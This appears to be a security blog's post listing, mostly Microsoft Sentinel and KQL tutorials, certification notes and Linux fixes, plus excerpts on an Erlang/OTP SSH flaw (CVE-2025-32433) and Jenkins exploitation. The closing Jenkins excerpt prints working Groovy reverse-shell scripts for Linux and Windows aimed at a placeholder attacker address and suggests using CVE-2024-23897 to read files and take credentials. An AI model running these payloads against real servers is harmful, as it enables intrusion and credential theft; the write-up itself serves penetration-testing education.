Skip to main content

Posts

Microsoft Sentinel : KQL extend operator

Used to extend the current dataset to columns as per the requirement. In this example, a new column named “ BootSince_newColumn ” is added to the output using the extend operator. This new variable calculates the time difference since boot time and now.   The output shows the newly added column  BootSince_newColumn with the value 2342, which is the number of hours since the boot time. For a more commonly applicable real world example, extend operator can be used to calculate the number of days since the last login date.
Recent posts

Microsoft Sentinel : KQL project operator

Project operator is used to customize the query result output as per your needs. This doesn't remove or modify any logs. It only affects how it is presented for that particular query, for that particular run. To keep only one particular column details instead of all available columns. If you wish to remove only a column and keep all other available columns, then use project-away   project-rename option can be used to rename the column name. Here in this example, the column with name "Computer" is renamed to "device". To reorder the columns, use project-reorder To summarize, Operator Description project Determines the columns to include, rename, or drop, and insert new computed columns. project-away Determines which columns from the input should be excluded from the output. project-keep Determine what columns from the input to keep in the output using a column name pattern match. project-rename Renames columns in the output project-reorder Reorder columns in the ...

Microsoft Sentinel : KQL search query with examples

Search operator To search for all logs that contain a particular keyword. This is useful when you are unsure about a table. search “keyword” And, or combining with the search operator. search “admin” and “login” search “admin” and (“login” or “logout”) To search only on particular tables. search in (SigninLogs ,SecurityEvent) "failed" Typically the search is case insensitive. To Search with case sensitive, use search kind=case_sensitive “admin” Lets try another case sensitive search, Return no result as intended. We can also use wildcards (*) if we are unsure about the exact table name. Performing more granular search. Look for particular keywords in specific columns in a table. search UserName contains “admin” or UserName contains “admin”

Free resources to learn Kusto Query Language (KQL) for Microsoft Sentinel

  Free resources to learn Kusto Query Language (KQL) for Microsoft Sentinel 1) Must learn KQL This repository from Rod-Trent contains the code, queries, and a free eBook included as part of the Must Learn KQL series.There is also a YouTube playlist related to this.  https://github.com/rod-trent/MustLearnKQL 2) Udemy: Learn KQL for Microsoft Sentinel An Udemy free course created by Samik Roy, designed to refresh your KQL learning and help you to boost your application for Sentinel   https://www.udemy.com/course/learn-kql-for-microsoft-sentinel/ 3) SC-200: Create queries for Microsoft Sentinel using Kusto Query Language (KQL) Microsoft Learn path. Write Kusto Query Language (KQL) statements to query log data to perform detections, analysis, and reporting in Microsoft Sentinel. This learning path will focus on the most used operators. The example KQL statements will showcase security related table queries.   https://learn.microsoft.com/en-us/training/paths/sc-200-u...

Unauthenticated Remote Code Execution in Erlang/OTP SSH (CVE-2025-32433)

Erlang, a programming language for building scalable real-time systems with high availability, forms a powerful ecosystem with the Open Telecom Platform (OTP) framework. Erlang/OTP SSH, an implementation of the SSH protocol, enables secure shell access and file transfers within Erlang-based systems. On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device. CVE-2025-32433 is rated with a severity level 10/10. If upgrade is not possible, then disable SSH as a temporary workaround. PoC Exploit URL : https://github.com/ProDefense/CVE-2025-32433 In this PoC, the payload is harmless. It creates the file lab.txt with the contents being pwned. If needed to create a more serious payload or RCE, it must be written in Erlang language.  For example, for having a netcat reverse shell payload, use the following comment (by editing the PoC...

Ingest Data in Microsoft Sentinel

After deploying Sentinel by creating/assigning a Log Analytics Workspace, next phase is to ingest logs in to Log Analytics Workspaces using data connectors. Data connectors are used to get logs from various sources. This includes the cloud native sources as well as third party sources. Microsoft Sentinel Content hub enables you to discover and install out of the box solutions for Sentinel. This solution is like a package that includes analytics rules, data connectors, playbooks etc pertaining to that particular product or solution. So, when a solution is deployed from the content hub, these associated components will also get installed. If the entire contents are not required then we can opt for a stand-alone content source. Lets install Microsoft Entra ID solution from Content hub. Click on Install. We can see, there are 64 analytics rules, 1 data connector, 11 playbooks and 2 workbooks in this solution. Click on Manage to configure. We can click on each content and configure separate...

Log Analytics Workspace and Microsoft Sentinel

Log Analytics workspaces is a type of Azure service where the logs can be collected and stored for analysis and retention. Logs from various sources can be piped to the Log Analytics Workspace and it is one of the crucial components for Microsoft Sentinel. Log Analytics Workspace serves as the centralised repository for the logs. The logs are piped using connectors and agents. A retention policy can be set on Log Analytics workspace for compliance requirements. The logs are then used for analysis using Kusto Query Language (KQL). KQL helps to query, filter data to identify patterns, anomalies and potential threats in the environment. In addition to log storage, Log Analytics workspaces offers dashboards and data visualisation options using queries and metrics. Log Analytics can be integrated with Microsoft Sentinel and with Microsoft Defender for Cloud. Sentinel utilises the data stored in Log Analytics workspaces to perform analysis, threat detection, threat hunting and for incident i...

About Microsoft Sentinel

A Security Operations Centre is a centralised unit that monitors traffic, triage alerts, participates in incident response, perform threat hunting and often performs vulnerability assessments. The individuals who work in a SOC are often referred to as SOC analysts. When it comes to Microsoft Azure SOC, the analysts work predominantly on Microsoft Security, Compliance and identity products and solutions such as Microsoft 365, Defender for Cloud, Microsoft 365 Defender, Sentinel etc. Let's go through the top two products that are critical for a SOC. SIEM and SOAR. A SIEM or Security Information and Event Management provides a centralised management and a holistic view of all events happening in the organisation by collecting and analysing logs from different sources across. SIEM uses correlation to detect anomalies and create alerts based on the conditions. Whereas a SOAR or Security Orchestration Automation and Response helps to handle incidents efficiently and automatically by inte...

CREST CPSA Exam resources

CREST Practitioner Security Analyst (CPSA) As exam candidates, it might be quite difficult to prepare for the CREST CPSA certification exam as there is no official courseware from CREST. Though there are recommendations from CREST, it is cumbersome to go through each one for the preparation. Therefore, I have written a book on CREST CPSA, aligned with the exam syllabus, covering all knowledge groups. The book is available from Amazon as both Paperbook and eBook format.  Amazon link : https://www.amazon.com/CREST-Practitioner-Security-Analyst-CPSA-ebook/dp/B0F2YGQJQB/ Feel free to check the showcase page cpsaexam.com I am also working on a practice test based on the exam syllabus and the exam study guide. This is scheduled to be released on April 2025.  

Passed the CompTIA CloudNetX Certification

Last July 2024, I participated in the CompTIA CloudNetX Certification Beta Exam (CNX-001)and today I received my results and I passed!. As of Feb 2025, the exam is not yet available for purchase and is expected to be open by next month (Q1 2025). Comptia recommends A minimum of ten years of experience in the IT field and five years of experience in a network architect role, with experience in the hybrid cloud environment. Network+, Security+, and Cloud+ or equivalent experience. As per the exam description, The CompTIA CloudNetX certification exam will certify the successful candidate has the knowledge and skills required to: Analyze business requirements to design and configure secure network architecture for on-premises and cloud environments. Analyze requirements to design for network security, availability, Zero Trust, and identity and access management technologies. Apply and configure concepts and tools related to network monitoring and performance, automation, and scripting. Tro...

HP printer driver issue in Linux [FIX]

My HP printer was automatically detected by Ubuntu but was unable to print anything. You might also encounter issues with your HP printer connecting with Linux machine. The following solution may fix this issue. try the command hp-setup -i  This HP Linux imaging and Printing System utility will download the required drivers and install the printer successfully.

docker-compose: command not found | Kali Linux [FIX]

You might be facing issues in installing docker compose in Kali linux.   In the latest Kali linux versions, the docker-compose cannot be installed in the transitional way. However the standalone version can be installed, as mentioned in the installation guide. To download and install the Docker Compose standalone, run: sudo curl -SL https://github.com/docker/compose/releases/download/v2.32.3/docker-compose-linux-x86_64 -o /usr/local/bin/docker-compose Apply executable permissions to the standalone binary in the target path for the installation. sudo chmod +x /usr/local/bin/docker-compose Test and execute Docker Compose commands using docker-compose.

error: externally-managed-environment | pip3 install Error [FIX]

  When a package manager is managing a Python environment,it prevents pip from performing system-wide installation. You can use  --break-system-packages to bypass this protection. Add --break-system-packages at the end of pip. Eg: pip install xyz --break-system-packages

Exploiting Jenkins + CVE-2024-23897

Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()   For Windows,   String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...